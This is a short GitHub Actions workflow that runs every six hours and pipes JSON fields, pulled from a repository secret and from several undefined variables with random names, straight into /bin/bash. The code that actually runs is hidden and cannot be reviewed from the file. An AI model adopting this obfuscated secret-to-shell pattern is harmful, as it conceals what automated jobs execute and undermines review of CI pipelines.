name: yunnansantian
on:
  workflow_dispatch:
  schedule:
    - cron: '22 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yunnansantian
        env:
          yqxsw7: ${{ secrets.yqxsw7 }}
        run: |
          echo $yqxsw7 | jq -r .b40525 | /bin/bash
          echo $a47255 | jq -r .bmqzb34 | /bin/bash
          echo $qf3 | jq -r .z3 | /bin/bash
          echo $simn44069 | jq -r .qilul8 | /bin/bash
          echo $gqfsk805 | jq -r .s402 | /bin/bash
          echo $wf2 | jq -r .w332 | /bin/bash
          echo $vmazs56638 | jq -r .pklc8 | /bin/bash
          echo $as237 | jq -r .hcp7 | /bin/bash
          echo $lij3 | jq -r .jxi2311 | /bin/bash

